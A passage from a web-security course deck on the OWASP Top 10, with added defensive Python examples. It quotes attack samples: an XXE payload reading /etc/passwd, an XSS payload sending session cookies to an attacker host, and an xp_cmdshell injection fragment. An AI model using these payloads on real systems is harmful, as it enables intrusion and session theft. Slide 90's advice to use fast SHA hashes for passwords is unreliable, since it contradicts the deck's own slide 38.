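        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def register(self, username, password):
        if is_weak_password(password):
            raise ValueError("password is too short or on the weak-password list")
        salt = secrets.token_bytes(16)
        self.users[username] = (salt, self._hash(password, salt))

    def login(self, username, password):
        """Return (ok, message, session_id). The message never reveals whether the user exists."""
        now = self.clock()
        count, refuse_until = self.failures.get(username, (0, 0.0))
        if now < refuse_until:
            return False, GENERIC_FAILURE, None      # increasing delay still in force
        # Unknown users get a dummy record so the hash is still computed (no timing-based enumeration).
        salt, stored = self.users.get(username, (b"\0" * 16, b"\0" * 32))
        ok = hmac.compare_digest(self._hash(password, salt), stored) and username in self.users
        if not ok:
            count += 1
            self.failures[username] = (count, now + min(2 ** count, 300))   # 2s, 4s, 8s ... capped at 5 min
            if count >= self.ALERT_THRESHOLD:
                self.alerts.append(f"{count} consecutive failures for {username!r}")
            return False, GENERIC_FAILURE, None
        self.failures.pop(username, None)
        session_id = secrets.token_urlsafe(32)         # fresh high-entropy ID after every login
        self.sessions[session_id] = {"user": username, "created": now, "last_seen": now}
        return True, "ok", session_id

    def current_user(self, session_id):
        """Resolve a session, enforcing idle and absolute timeouts; None if the session is not valid."""
        session = self.sessions.get(session_id)
        if session is None:
            return None
        now = self.clock()
        if now - session["last_seen"] > self.IDLE_TIMEOUT or now - session["created"] > self.ABSOLUTE_TIMEOUT:
            self.sessions.pop(session_id, None)
            return None
        session["last_seen"] = now
        return session["user"]

    def logout(self, session_id):
        self.sessions.pop(session_id, None)             # server-side invalidation, not just a cookie delete
```

With the fake clock, the slide 31 scenario plays out directly: a user logs in, walks away without logging out, and sixteen minutes later the session ID no longer resolves to a user.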
33. 3. Sensitive Data Exposure
• Rather than directly attacking crypto, attackers steal keys, execute man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s client, e.g. browser.
• A manual attack is generally required.
• Previously retrieved password databases could be brute forced by Graphics Processing Units (GPUs).
• The most common flaw is simply not encrypting sensitive data.
• When crypto is employed, weak key generation and management,
and weak algorithm, protocol and cipher usage is common,
particularly for weak password hashing storage techniques.
34. Sensitive Data Exposure
• For data in transit, server-side weaknesses are mostly easy to detect; weaknesses in data at rest are hard to detect.
• Failure frequently compromises all data that should have been
protected.
• Typically, this information includes sensitive personal information (PII) such as health records, credentials, personal data, and credit cards.
35. Is the Application Vulnerable?
• Is any data transmitted in clear text? This concerns protocols such as HTTP, SMTP, and FTP.
• External internet traffic is especially dangerous. Verify all internal
traffic e.g. between load balancers, web servers, or back-end systems.
• Is sensitive data stored in clear text, including backups?
• Are any old or weak cryptographic algorithms used?
36. Is the Application Vulnerable?
• Are default crypto keys in use, weak crypto keys generated or re-used,
or is proper key management or rotation missing?
• Is encryption not enforced, e.g. are any user agent (browser) security
directives or headers missing?
• Does the user agent (e.g. app, mail client) not verify if the received
server certificate is valid?
37. How to Prevent
• Classify data processed, stored, or transmitted by an application.
Identify which data is sensitive according to privacy laws, regulatory
requirements, or business needs.
• Apply controls as per the classification.
• Don’t store sensitive data unnecessarily. Discard it as soon as possible
or use PCI DSS compliant tokenization or even truncation. Data that is
not retained cannot be stolen.
• Make sure to encrypt all sensitive data at rest.
• Ensure up-to-date and strong standard algorithms, protocols, and
keys are in place; use proper key management.
38. How to Prevent
• Encrypt all data in transit with secure protocols such as TLS with
perfect forward secrecy (PFS) ciphers, cipher prioritization by the
server, and secure parameters. Enforce encryption using directives
like HTTP Strict Transport Security (HSTS).
• Disable caching for responses that contain sensitive data.
• Store passwords using strong adaptive and salted hashing functions
with a work factor (delay factor), such as Argon2, scrypt, bcrypt, or
PBKDF2.
• Verify independently the effectiveness of configuration and settings.
39. Example Attack Scenarios
• Scenario #1: An application encrypts credit card numbers in a
database using automatic database encryption.
• However, this data is automatically decrypted when retrieved,
allowing an SQL injection flaw to retrieve credit card numbers in clear
text.
40. Scenario #2
• A site doesn't use or enforce TLS for all pages or supports weak
encryption.
• An attacker monitors network traffic (e.g. at an insecure wireless network), downgrades connections from HTTPS to HTTP, intercepts requests, and steals the user's session cookie.
• The attacker then replays this cookie and hijacks the user's
(authenticated) session, accessing or modifying the user's private
data. Instead of the above they could alter all transported data, e.g.
the recipient of a money transfer.
41. Scenario #3:
• The password database uses unsalted or simple hashes to store
everyone's passwords.
• A file upload flaw allows an attacker to retrieve the password
database.
• All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes.
• Hashes generated by simple or fast hash functions may be cracked by
GPUs, even if they were salted.
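To make the hashing advice from slide 38 and the scenario on slide 41 concrete, here is an added example (my own code, not from the talk) contrasting an unsalted fast hash, which a precomputed lookup table of common passwords cracks immediately and which gives identical digests to users sharing a password, with a salted scrypt record from the standard library that is verified in constant time. The password list and the scrypt parameters are constructed assumptions.

```python
import hashlib
import hmac
import secrets

# Constructed list of common passwords, standing in for an attacker's precomputed lookup table.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein", "football", "iloveyou"]

def weak_store(password):
    # What slide 41 warns about: a fast, unsalted hash. Two users with the same password
    # get the same digest, and one precomputed table cracks every copy at once.
    return hashlib.md5(password.encode()).hexdigest()

def build_lookup_table(candidates):
    # Precomputed digest -> password mapping (the idea behind a rainbow table, without the chains).
    return {weak_store(p): p for p in candidates}

def crack_unsalted(digest, table):
    return table.get(digest)     # None when the password is not in the table

# scrypt parameters are illustrative (n=2**14, r=8, p=1 uses about 16 MiB); tune to your hardware.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1

def strong_store(password, salt=None):
    # Salted, memory-hard, adaptive hash. The record is self-describing, so the work factor
    # can be raised later and old records re-hashed on the user's next login.
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${salt.hex()}${digest.hex()}"

def verify(password, record):
    algo, n, r, p, salt_hex, digest_hex = record.split("$")
    if algo != "scrypt":
        raise ValueError("unsupported hash record")
    candidate = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                               n=int(n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(candidate.hex(), digest_hex)   # constant-time comparison

if __name__ == "__main__":
    table = build_lookup_table(COMMON_PASSWORDS)
    print("unsalted md5 of 'letmein' cracks to:", crack_unsalted(weak_store("letmein"), table))
    record = strong_store("letmein")
    print("scrypt record:", record)
    print("verify correct:", verify("letmein", record), "verify wrong:", verify("wrong", record))
```

Because each scrypt record carries its own random salt, the same password stored twice yields two different records, and a table precomputed against one salt is useless against any other; the work factor additionally makes each guess expensive even on GPUs.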
43. XML External Entities (XXE)
• Attackers can exploit vulnerable XML processors if they can upload XML or include hostile content in an XML document, exploiting vulnerable code, dependencies or integrations.
44. XML External Entities (XXE)
• By default, many older XML processors allow specification of an
external entity, a URI that is dereferenced and evaluated during XML
processing.
• These flaws can be used to:
• extract data,
• execute a remote request from the server,
• scan internal systems,
• perform a denial-of-service attack
45. Is the Application Vulnerable?
• The application accepts XML directly or XML uploads, especially from
untrusted sources, or inserts untrusted data into XML documents,
which is then parsed by an XML processor.
• Any of the XML processors in the application or SOAP based web
services has document type definitions (DTDs) enabled. As the exact
mechanism for disabling DTD processing varies by processor, it is
good practice to consult a reference such as the OWASP Cheat Sheet
'XXE Prevention’.
46. XML External Entities (XXE)
• If your application uses SAML for identity processing within federated security or for single sign-on (SSO): SAML uses XML for identity assertions, and may be vulnerable.
• If the application uses SOAP prior to version 1.2, it is likely susceptible
to XXE attacks if XML entities are being passed to the SOAP
framework.
• Being vulnerable to XXE attacks likely means that the application is
vulnerable to denial of service attacks including the Billion Laughs
attack.
47. How to Prevent
• Use less complex data formats such as JSON, and avoid serialization of sensitive data.
• Patch or upgrade all XML processors and libraries in use by the
application or on the underlying operating system.
• Use dependency checkers.
• Update SOAP to SOAP 1.2 or higher.
• Disable XML external entity and DTD processing in all XML parsers in the application.
48. How to Prevent
• Implement positive ("whitelisting") server-side input validation,
filtering, or sanitization to prevent hostile data within XML
documents, headers, or nodes.
• Verify that XML or XSL file upload functionality validates incoming
XML using XSD validation or similar.
• Virtual patching, API security gateways, or Web Application Firewalls (WAFs) can help detect, monitor, and block XXE attacks.
49. Example Attack Scenarios
• The attacker attempts to extract data from the server:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
<!ENTITY xxe SYSTEM "https://192.168.1.1/private" >]> --PrivateNet
<!ENTITY xxe SYSTEM "file:///dev/random" >]> -- DDoS
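Added example for slides 44 to 49 (my own code, not the talk's): a parser built on Python's standard-library expat bindings that refuses DTD processing outright, which is what "disable XML external entity and DTD processing" looks like in Python without a third-party library (the technique is the one defusedxml uses). It keeps the slide 49 document verbatim as a test input and adds a constructed entity-expansion document of the Billion Laughs kind and a clean order document; the order format is an assumption.

```python
import xml.parsers.expat

# The attack document from slide 49, kept verbatim; the other two samples are constructed.
XXE_SAMPLE = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>"""

# A tiny entity-expansion document: no external entity, but a DTD all the same.
EXPANSION_SAMPLE = """<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;">]>
<lolz>&lol2;</lolz>"""

CLEAN_SAMPLE = '<order id="42"><item sku="A1">2</item></order>'

class DTDForbidden(ValueError):
    """Raised as soon as a DOCTYPE, entity declaration or external entity reference is seen."""

def parse_without_dtd(xml_text):
    """Parse XML into nested dicts while refusing all DTD processing.

    expat callbacks abort the parse on the first DTD-related event, so neither file:// or
    http:// fetches nor entity expansion can ever happen, whatever the document declares.
    """
    parser = xml.parsers.expat.ParserCreate()
    root = {"tag": None, "attrs": {}, "text": "", "children": []}
    stack = [root]

    def forbid(*event_args):
        raise DTDForbidden(f"DTD processing is disabled (saw {event_args[0]!r})")

    parser.StartDoctypeDeclHandler = forbid     # fires at "<!DOCTYPE"
    parser.EntityDeclHandler = forbid           # fires at "<!ENTITY"
    parser.ExternalEntityRefHandler = forbid    # belt and braces: never dereference a SYSTEM entity

    def start(name, attrs):
        node = {"tag": name, "attrs": attrs, "text": "", "children": []}
        stack[-1]["children"].append(node)
        stack.append(node)

    def end(name):
        stack.pop()

    def chars(data):
        stack[-1]["text"] += data

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars

    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    parser.Parse(data, True)
    return root["children"][0]

def accepts(xml_text):
    """True if the document parses under the no-DTD policy, False if it was rejected."""
    try:
        parse_without_dtd(xml_text)
        return True
    except (DTDForbidden, xml.parsers.expat.ExpatError):
        return False

if __name__ == "__main__":
    print("clean document:", parse_without_dtd(CLEAN_SAMPLE))
    for name, doc in (("XXE sample", XXE_SAMPLE), ("expansion sample", EXPANSION_SAMPLE)):
        print(name, "accepted" if accepts(doc) else "rejected")
```

Rejecting at the DOCTYPE rather than only at external entities is deliberate: it also stops the internal-entity expansion attacks the slides mention, and a document that legitimately needs a DTD should be validated against an XSD you control instead.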
51. Broken Access Control
• Access control enforces policy such that users cannot act outside of
their intended permissions.
• Manual testing is the best way to detect missing or ineffective access control, including HTTP method (GET vs PUT, etc.), controller, and direct object references.
• Typical failures: attackers acting as users or administrators, users using privileged functions, or users creating, accessing, updating or deleting every record.
52. Broken Access Control
• Bypassing access control checks by modifying the URL, internal
application state, or the HTML page, or simply using a custom API
attack tool.
• Allowing the primary key to be changed to another user's record, permitting viewing or editing someone else's account.
• Elevation of privilege. Acting as a user without being logged in, or
acting as an admin when logged in as a user.
53. Broken Access Control
• Metadata manipulation, such as replaying or tampering with a JSON
Web Token (JWT) access control token or a cookie or hidden field
manipulated to elevate privileges, or abusing JWT invalidation
• CORS misconfiguration allows unauthorized API access.
• Force browsing to authenticated pages as an unauthenticated user or
to privileged pages as a standard user. Accessing API with missing
access controls for POST, PUT and DELETE.
54. How to Prevent
• Enforce access control in trusted server-side code or a server-less API, where the attacker cannot modify the check.
• With the exception of public resources, deny by default.
• Implement access control mechanisms once and reuse them throughout the application, including minimizing CORS usage.
• Model access controls should enforce record ownership, rather than accepting that the user can create, read, update, or delete any record.
• Unique application business limit requirements should be enforced by domain models.
55. Prevention
• Disable web server directory listing and ensure file metadata (e.g. .git)
and backup files are not present within web roots.
• Log access control failures, alert admins when appropriate (e.g.
repeated failures).
• Rate limit API and controller access to minimize the harm from
automated attack tooling.
• JWT tokens should be invalidated on the server after logout
56. Example Attack Scenarios
• Scenario #1: The application uses unverified data in a SQL call that is accessing account information:
pstmt.setString(1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery();
• An attacker simply modifies the 'acct' parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user's account.
http://example.com/app/accountInfo?acct=notmyacct
57. Attack Scenario
• Scenario #2: An attacker simply force browses to target URLs.
• Admin rights are required for access to the admin page.
• http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo
• If an unauthenticated user can access either page, it’s a flaw.
• If a non-admin can access the admin page, this is a flaw.
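Both scenarios have the same fix from the prevention slides: deny by default and make the query itself enforce record ownership. The following is an added Python/sqlite3 example (not code from the deck) that places the slide's flaw beside the corrected version and adds a deny-by-default route table for the two URLs in Scenario #2. The account data, user names and role names are constructed for the demo.

```python
import sqlite3


class AccessDenied(PermissionError):
    """Raised for any request the policy does not explicitly allow."""


def make_db():
    """Constructed sample data: two accounts owned by two different users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (acct TEXT PRIMARY KEY, owner TEXT, balance INTEGER)")
    db.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("A-1001", "alice", 250), ("A-2002", "bob", 900)],
    )
    return db


def account_info_insecure(db, acct):
    """Mirrors the slide: the request's account number is the only key used."""
    return db.execute(
        "SELECT acct, owner, balance FROM accounts WHERE acct = ?", (acct,)
    ).fetchone()


def account_info(db, session_user, acct):
    """Record ownership enforced in the query: the row must belong to the caller."""
    row = db.execute(
        "SELECT acct, owner, balance FROM accounts WHERE acct = ? AND owner = ?",
        (acct, session_user),
    ).fetchone()
    if row is None:
        # Same answer whether the record is missing or belongs to someone else,
        # so the response does not confirm which account numbers exist.
        raise AccessDenied("account not found or not owned by caller")
    return row


def can_read_account(db, session_user, acct):
    try:
        account_info(db, session_user, acct)
        return True
    except AccessDenied:
        return False


# Scenario #2: routes and the roles allowed to reach them. Anything not listed
# is denied, which is what "deny by default" means in practice.
ROUTE_ROLES = {
    "/app/getappInfo": {"user", "admin"},
    "/app/admin_getappInfo": {"admin"},
}


def authorize(path, session):
    """session is None for an unauthenticated request, else {'user': ..., 'role': ...}."""
    allowed = ROUTE_ROLES.get(path)
    if allowed is None or session is None or session.get("role") not in allowed:
        raise AccessDenied(path)
    return True


def can_access(path, session):
    try:
        return authorize(path, session)
    except AccessDenied:
        return False


if __name__ == "__main__":
    db = make_db()
    print(account_info_insecure(db, "A-2002"))          # anyone gets bob's row
    print(can_read_account(db, "alice", "A-2002"))      # False
    print(can_access("/app/admin_getappInfo", {"user": "alice", "role": "user"}))  # False
```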
59. Security Misconfiguration
• Attackers will often attempt to exploit:
• unpatched flaws,
• default accounts,
• unused pages,
• unprotected files and directories, etc.
• to gain unauthorized access or knowledge of the system.
60. Can happen in
• network services, platform, web server, application server, database, frameworks, custom code, and pre-installed virtual machines, containers, or storage.
• Automated scanners are useful for detecting misconfigurations, use of default accounts or configurations, unnecessary services, legacy options, etc.
• Such flaws frequently give attackers unauthorized access to some system data or functionality.
• Occasionally, such flaws result in a complete system compromise.
61. Is the Application Vulnerable?
• Missing appropriate security hardening across any part of the
application stack, or improperly configured permissions on cloud
services.
• Unnecessary features are enabled or installed (e.g. unnecessary
ports, services, pages, accounts, or privileges).
• Default accounts and their passwords still enabled and unchanged.
• Error handling reveals stack traces or other overly informative error
messages to users.
62. Is the Application Vulnerable?
• For upgraded systems, the latest security features are disabled or not configured securely.
• The security settings in the application servers, application frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc. are not set to secure values.
• The server does not send security headers or directives, or they are not set to secure values.
• The software is out of date or vulnerable.
63. How to Prevent
• A repeatable hardening process that makes it fast and easy to deploy
another environment that is properly locked down. Development, QA,
and production environments should all be configured identically,
with different credentials used in each environment. This process
should be automated to minimize the effort required to setup a new
secure environment.
• A minimal platform without any unnecessary features, components,
documentation, and samples. Remove or do not install unused
features and frameworks.
64. How to Prevent
• Review and update the configurations in line with all security notes, updates, and patches as part of the patch management process.
• Review cloud storage permissions (e.g. S3 bucket permissions).
• A segmented application architecture that provides separation between components or tenants, with segmentation, containerization, or cloud security groups.
• Sending security directives to clients, e.g. security headers.
• An automated process to verify the effectiveness of the configurations and settings in all environments.
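The last two bullets go together: the security headers a server sends are configuration, and an automated check can verify them in every environment. The following is an added Python example (not from the deck) that audits a response's headers against a baseline and flags version-disclosing headers of the kind the "overly informative error messages" bullet warns about. The baseline values and both sample responses are constructed for the demo; adapt the expectations to your own policy.

```python
# Baseline expectations (an assumption of this example, not a list from the deck).
REQUIRED_HEADERS = {
    "strict-transport-security": lambda v: "max-age=" in v.lower(),
    "x-content-type-options": lambda v: v.strip().lower() == "nosniff",
    "x-frame-options": lambda v: v.strip().upper() in ("DENY", "SAMEORIGIN"),
    "content-security-policy": lambda v: "default-src" in v.lower(),
}

# Headers that commonly carry component versions; a digit in them is a disclosure.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version")


def audit_response_headers(headers):
    """Return a list of findings for one HTTP response's headers (empty = passes)."""
    lowered = {name.lower(): value for name, value in headers.items()}
    findings = []
    for name, is_acceptable in REQUIRED_HEADERS.items():
        if name not in lowered:
            findings.append(f"missing: {name}")
        elif not is_acceptable(lowered[name]):
            findings.append(f"weak: {name}={lowered[name]}")
    for name in DISCLOSURE_HEADERS:
        value = lowered.get(name)
        if value is not None and any(ch.isdigit() for ch in value):
            findings.append(f"version disclosed: {name}={value}")
    return findings


# Constructed sample responses: a typical default install and a hardened one.
WEAK_RESPONSE = {
    "Server": "Apache/2.4.29 (Ubuntu)",
    "X-Powered-By": "PHP/7.2.24",
    "X-Frame-Options": "ALLOWALL",
    "Content-Type": "text/html",
}
HARDENED_RESPONSE = {
    "Server": "Apache",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'self'",
    "Content-Type": "text/html",
}


if __name__ == "__main__":
    for finding in audit_response_headers(WEAK_RESPONSE):
        print(finding)
    print("hardened findings:", audit_response_headers(HARDENED_RESPONSE))  # []
```

Run this against the headers returned by each environment (development, QA, production) and treat any finding as a build failure; that is the "automated process to verify the effectiveness of the configurations" turned into a concrete check.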
65. Example Attack Scenarios
• Scenario #1: The application server comes with sample applications that are not removed from the production server.
• These sample applications have known security flaws attackers use to compromise the server.
• If one of these applications is the admin console, and default accounts weren't changed, the attacker logs in with default passwords and takes over.
66. Scenario #2
• Directory listing is not disabled on the server.
• An attacker discovers they can simply list directories.
• The attacker finds and downloads the compiled Java classes, which
they decompile and reverse engineer to view the code.
• The attacker then finds a serious access control flaw in the
application.
67. Scenario #3
• The application server’s configuration allows detailed error messages,
e.g. stack traces, to be returned to users.
• This potentially exposes sensitive information or underlying flaws
such as component versions that are known to be vulnerable.
68. Scenario #4
• A cloud service provider has default sharing permissions open to the
Internet by other CSP users.
• This allows sensitive data stored within cloud storage to be accessed.
70. Cross-Site Scripting (XSS)
• Reflected XSS
• DOM XSS
• Stored XSS
• The impact of XSS is moderate for reflected and DOM XSS and severe for stored XSS.
• Consequences include remote code execution in the victim's browser, stealing credentials or sessions, and delivering malware to the victim.
71. Reflected XSS
• The application or API includes unvalidated and unescaped user input as part of HTML output.
• A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim's browser.
• Typically the user will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.
72. Stored XSS and DOM XSS
• Stored XSS: The application or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.
• DOM XSS: JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data in a page are vulnerable to DOM XSS. Ideally, the application would not send attacker-controllable data to unsafe JavaScript APIs.
73. Impact
• session stealing, account takeover, MFA bypass, DOM node
replacement or defacement (such as trojan login panels), attacks
against the user's browser such as malicious software downloads, key
logging, and other client-side attacks.
74. How to Prevent
• Use frameworks that automatically escape XSS by design, such as the latest Ruby on Rails or React JS.
• Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve reflected and stored XSS vulnerabilities.
• Applying context-sensitive encoding when modifying the browser document on the client side acts against DOM XSS.
75. Example Attack Scenario
• Scenario 1: The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
• The attacker modifies the 'CC' parameter in the browser to:
'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
• This attack causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session.
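The snippet fails because the CC value is placed in an HTML attribute context with no escaping for that context, so a single quote closes the attribute. The following is an added Python example (not code from the deck) that puts the slide's string concatenation beside the escaped version: `html.escape(..., quote=True)` encodes &, <, >, " and ', so the value can no longer break out of value='...'. The payload is a constructed, harmless stand-in for the slide's cookie-stealing one; the card number is also constructed.

```python
import html


def input_tag_insecure(cc):
    """Mirrors the slide: the untrusted value is concatenated straight into the attribute."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def input_tag(cc):
    """Attribute context: escape &, <, >, " and ' so the value stays inside the quotes."""
    return "<input name='creditcard' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"


# Constructed stand-in for the slide's payload: closes the attribute, then injects a script.
PAYLOAD = "'><script>alert(1)</script>'"


def injected_script_count(markup):
    """Number of <script> elements that would be parsed out of the markup."""
    return markup.lower().count("<script")


if __name__ == "__main__":
    print(input_tag("4111111111111111"))  # normal input renders unchanged
    print(input_tag_insecure(PAYLOAD))   # attribute closed, <script> element created
    print(input_tag(PAYLOAD))            # &#x27;&gt;&lt;script&gt;... stays inside value=''
```

The escaping function depends on where the value lands: this one is right for an HTML body or quoted attribute, but a value inserted into a JavaScript string, a CSS property or a URL needs that context's encoder, which is the point of the "based on the context" bullet above.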
81. Case 1
• Drop-down menu & radio button
• What is your favourite color?
o Red
o Blue
o Green
• Is it safe?
82. Browser → HTTP request → Web Application
POST /color.php HTTP/1.1
Host: www.example.xxx
Content-Length: 27
Content-Type: application/x-www-form-urlencoded

Color=Red → Attacker can modify this
Color=White ; Color= ';Exec+xp_cmdshell+'...'
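The radio buttons constrain nothing: the browser sends a text field, and the server must check it. The following is an added Python example (not code from the deck) of the server-side allow-list the case calls for. It parses the form body and accepts only a single Color value from the fixed set, so "White", an empty value, two values or any injection string are all rejected before the value reaches a query. The field name, allowed values and sample bodies follow the slide; the rest is constructed.

```python
from urllib.parse import parse_qs

# The only values the form offers; anything else did not come from our page.
ALLOWED_COLORS = {"Red", "Blue", "Green"}


class InvalidInput(ValueError):
    """Raised when a request parameter fails positive (allow-list) validation."""


def parse_color(body):
    """Validate the Color field of an application/x-www-form-urlencoded body."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("Color", [])
    if len(values) != 1:
        # Zero values, or a repeated parameter, is not the single choice the form sends.
        raise InvalidInput("exactly one Color value is required")
    color = values[0]
    if color not in ALLOWED_COLORS:
        # Positive validation: compare against the known-good set, do not try to
        # spot bad characters in the value.
        raise InvalidInput("Color is not one of the offered options")
    return color


def accepts(body):
    try:
        parse_color(body)
        return True
    except InvalidInput:
        return False


if __name__ == "__main__":
    print(parse_color("Color=Red"))            # Red
    print(accepts("Color=White"))              # False
    print(accepts("Color=Red%27%3B--"))        # False
```

The value returned by parse_color is then safe to use as a lookup key; with a parameterized query it would be safe even without the allow-list, and using both is the layered approach the injection slides recommend.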
83. Principle of Least Privilege
• Only give a user the permissions needed to accomplish what they need to do, and no more.
• Every new feature adds a potential vulnerability.
• Minimize user permissions.
• Minimize the capabilities of programming calls and objects.
84. Challenge
• Microservices written in node.js and Spring Boot are replacing
traditional monolithic applications.
• Microservices come with their own security challenges including
establishing trust between microservices, containers, secret
management, etc.
• Old code never expected to be accessible from the Internet is now
sitting behind an API or RESTful web service to be consumed by Single
Page Applications (SPAs) and mobile applications.
• Architectural assumptions by the code, such as trusted callers, are no
longer valid.
85. Challenge
• Single page applications, written in JavaScript frameworks such as Angular and React, allow the creation of highly modular feature-rich front ends.
• Client-side functionality that has traditionally been delivered server-side brings its own security challenges.
• JavaScript is now the primary language of the web, with node.js running server side and modern web frameworks such as Bootstrap, Electron, Angular, and React running on the client.
86. Classifying and Prioritizing Threats
• STRIDE: threat classification system (Microsoft)
• Spoofing
• Tampering
• Repudiation
• Information Disclosure
• Denial of Service
• Elevation of Privilege
89. Password Best Practice
• Minimum password length
• Enforce password complexity
• Rotate passwords (90 days)
• Password uniqueness
• Password must not equal the username
• Properly store passwords
90. Storing Passwords
• Don't store in plaintext
• Use a strong hash
• SHA-256, SHA-512
• MD5, SHA-1 (weak)
• 5E884898DA28047151D0E56F8DC6292773603D0D6AABBDD62A11EF721D1542D8
• Use salt
94. Securing Authentication
• SSL/TLS
• Account lockout (failed logins)
• Number of attempts
• Window of measurement
• Lockout period
• CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) against brute force
• No default accounts
• Don't hard-code credentials
• Remember me → cookie expiration
95. Session Management
• A session is a sequence of HTTP request and response transactions associated with the same user.
• Session timeout (4 hours)
• Idle session timeout (20 minutes)
• Limit session concurrency
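The lockout bullets on slide 94 (number of attempts, window of measurement, lockout period) and the timeout bullets on slide 95 (absolute timeout, idle timeout, concurrency limit) are all small pieces of state with a clock. The following is an added Python example (not code from the deck) that implements both as plain classes; time is passed in as a parameter so the behaviour can be checked deterministically. The defaults mirror the slide's figures; the 5-attempt/15-minute/30-minute lockout values and the concurrency cap of 2 are this example's assumptions.

```python
import secrets
from collections import deque


class AccountLockout:
    """Lock an account after max_attempts failures within window_s seconds."""

    def __init__(self, max_attempts=5, window_s=15 * 60, lockout_s=30 * 60):
        self.max_attempts = max_attempts
        self.window_s = window_s        # window of measurement
        self.lockout_s = lockout_s      # lockout period
        self._failures = {}             # user -> deque of failure timestamps
        self._locked_until = {}         # user -> time at which the lock expires

    def is_locked(self, user, now):
        until = self._locked_until.get(user)
        return until is not None and now < until

    def record_failure(self, user, now):
        """Count a failed login; returns True if this failure locked the account."""
        q = self._failures.setdefault(user, deque())
        q.append(now)
        while q and now - q[0] > self.window_s:   # forget failures outside the window
            q.popleft()
        if len(q) >= self.max_attempts:
            self._locked_until[user] = now + self.lockout_s
            q.clear()
            return True
        return False

    def record_success(self, user):
        self._failures.pop(user, None)
        self._locked_until.pop(user, None)


class SessionStore:
    """Server-side sessions with absolute and idle timeouts and a concurrency cap."""

    def __init__(self, absolute_s=4 * 3600, idle_s=20 * 60, max_concurrent=2):
        self.absolute_s = absolute_s
        self.idle_s = idle_s
        self.max_concurrent = max_concurrent
        self._sessions = {}  # sid -> {"user", "created", "last_seen"}

    def create(self, user, now):
        own = [sid for sid, s in self._sessions.items() if s["user"] == user]
        if len(own) >= self.max_concurrent:
            # Evict the user's oldest session instead of exceeding the cap.
            oldest = min(own, key=lambda sid: self._sessions[sid]["created"])
            del self._sessions[oldest]
        sid = secrets.token_urlsafe(32)   # unguessable session identifier
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def touch(self, sid, now):
        """Return the session's user and refresh its idle timer, or None if expired."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now - s["created"] > self.absolute_s or now - s["last_seen"] > self.idle_s:
            del self._sessions[sid]
            return None
        s["last_seen"] = now
        return s["user"]

    def invalidate(self, sid):
        """Logout: forget the session on the server, not only in the browser."""
        return self._sessions.pop(sid, None) is not None

    def count_for(self, user):
        return sum(1 for s in self._sessions.values() if s["user"] == user)


if __name__ == "__main__":
    lock = AccountLockout(max_attempts=3, window_s=60, lockout_s=300)
    for t in (0, 10, 20):
        lock.record_failure("bob", t)
    print(lock.is_locked("bob", 21), lock.is_locked("bob", 321))  # True False
    store = SessionStore()
    sid = store.create("bob", 0)
    print(store.touch(sid, 600), store.touch(sid, 600 + 1201))     # bob None
```

Rejecting a login while is_locked() is true, and calling record_success() on a good login, completes the lockout loop; invalidate() is the server-side step that slide 55 asks for when a JWT or session is logged out.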
96. ACL: Access Control List
• Permissions
• Read, Write, Execute
101. Learning Material
• DVWA (Damn Vulnerable Web Application)
• WebGoat
• Mutillidae
• OWASP Juice Shop
• bWAPP
• HackThisSite
• HackThis
• Altoro Mutual
102. References
• Zalewski, M. (2011). The Tangled Web: A Guide to Securing Modern Web Applications. No Starch Press.
• Sullivan, B., & Liu, V. (2011). Web Application Security, A Beginner's Guide. McGraw-Hill Education Group.
• OWASP: https://www.owasp.org/index.php/Main_Page
• Local Chapter: https://www.owasp.org/index.php/Catalunya
• CERT Secure Coding